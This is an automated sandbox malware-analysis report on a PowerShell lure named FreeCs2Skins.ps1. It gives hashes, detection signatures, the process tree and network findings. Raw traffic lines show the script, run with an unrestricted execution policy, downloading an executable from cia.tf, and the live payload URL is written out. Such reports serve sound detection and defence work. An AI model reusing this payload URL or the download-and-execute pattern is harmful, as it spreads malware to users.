Edit tour

Windows Analysis Report
FreeCs2Skins.ps1

Overview

General Information

Sample name:	FreeCs2Skins.ps1
Analysis ID:	1562380
MD5:	192bc64d6047bbc1b994c00b652ef3b5
SHA1:	349886ab9c80a78f584e2140e4e3bd85f2e717c6
SHA256:	b67ec07f0a31fc36bd7f8ddea36f21fdf53ec44d87b8eae0b42588b1fc963eff
Tags:	cia-tfps1user-JAMESWT_MHT
Infos:

Detection

Score:	48
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected suspicious sample

Creates HTML files with .exe extension (expired dropper behavior)

AV process strings found (often used to terminate AV products)

Contains long sleeps (>= 3 min)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

powershell.exe (PID: 3300 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\FreeCs2Skins.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\FreeCs2Skins.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\FreeCs2Skins.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\FreeCs2Skins.ps1", ProcessId: 3300, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\FreeCs2Skins.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\FreeCs2Skins.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\FreeCs2Skins.ps1", ProcessId: 3300, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T14:59:09.926351+0100	2803274	2	Potentially Bad Traffic	192.168.2.6	49700	172.67.129.178	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.3% probability

Source: unknown

HTTPS traffic detected: 172.67.129.178:443 -> 192.168.2.6:49699 version: TLS 1.2

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2254642292.000001AD43499000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2235888075.000001AD290A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdbes8l[u source: powershell.exe, 00000000.00000002.2254642292.000001AD434A9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2254642292.000001AD434A9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb4?Zu source: powershell.exe, 00000000.00000002.2254642292.000001AD434F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb/ source: powershell.exe, 00000000.00000002.2253609039.000001AD43221000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Networking

Creates HTML files with .exe extension (expired dropper behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: file.exe.0.dr

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic

Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49700 -> 172.67.129.178:443

Source: global traffic	HTTP traffic detected: GET /1d5ad9c8d3fee874d0feb8bfac220a11.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cia.tfConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cia.tf

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /1d5ad9c8d3fee874d0feb8bfac220a11.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cia.tfConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cia.tf

Source: global traffic

DNS traffic detected: DNS query: cia.tf

Source: powershell.exe, 00000000.00000002.2236342823.000001AD2C694000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C6D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cia.tf
Source: powershell.exe, 00000000.00000002.2250481889.000001AD3B251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2250481889.000001AD3B10E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2B2D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2B0A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.0.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2B2D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2B0A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2C71D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C729000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C6B9000.00000004.00000800.00020000.00000000.sdmp, file.exe.0.dr	String found in binary or memory: https://bad.is-having.fun
Source: file.exe.0.dr	String found in binary or memory: https://cia.tf
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2C6C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cia.tf/
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2CC18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2B2D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236236773.000001AD293E5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2BCD3000.00000004.00000800.00020000.00000000.sdmp, FreeCs2Skins.ps1	String found in binary or memory: https://cia.tf/1d5ad9c8d3fee874d0feb8bfac220a11.exe
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2B2D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cia.tf/1d5ad9c8d3fee874d0feb8bfac220a11.exeP
Source: powershell.exe, 00000000.00000002.2250481889.000001AD3B10E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2250481889.000001AD3B10E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2250481889.000001AD3B10E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2C71D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C729000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C6B9000.00000004.00000800.00020000.00000000.sdmp, file.exe.0.dr	String found in binary or memory: https://coquettte.com
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2C71D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C729000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C6B9000.00000004.00000800.00020000.00000000.sdmp, file.exe.0.dr	String found in binary or memory: https://fonts.googleapis.com
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2C71D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C729000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C6B9000.00000004.00000800.00020000.00000000.sdmp, file.exe.0.dr	String found in binary or memory: https://fonts.googleapis.com/css2?family=Inter:ital
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2C71D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C729000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236342823.000001AD2C6B9000.00000004.00000800.00020000.00000000.sdmp, file.exe.0.dr	String found in binary or memory: https://fonts.gstatic.com
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2B2D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2236342823.000001AD2BCD3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.2250481889.000001AD3B251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2250481889.000001AD3B10E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443

Source: unknown

HTTPS traffic detected: 172.67.129.178:443 -> 192.168.2.6:49699 version: TLS 1.2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34896882	0_2_00007FFD34896882
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD348965F5	0_2_00007FFD348965F5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34893A32	0_2_00007FFD34893A32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34894E5A	0_2_00007FFD34894E5A

Source: classification engine

Classification label: mal48.winPS1@3/7@1/1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6232:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hxz4i341.os2.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\FreeCs2Skins.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdatauser.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2254642292.000001AD43499000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2235888075.000001AD290A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdbes8l[u source: powershell.exe, 00000000.00000002.2254642292.000001AD434A9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2254642292.000001AD434A9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb4?Zu source: powershell.exe, 00000000.00000002.2254642292.000001AD434F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb/ source: powershell.exe, 00000000.00000002.2253609039.000001AD43221000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_00007FFD348900BD pushad ; iretd

0_2_00007FFD348900C1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
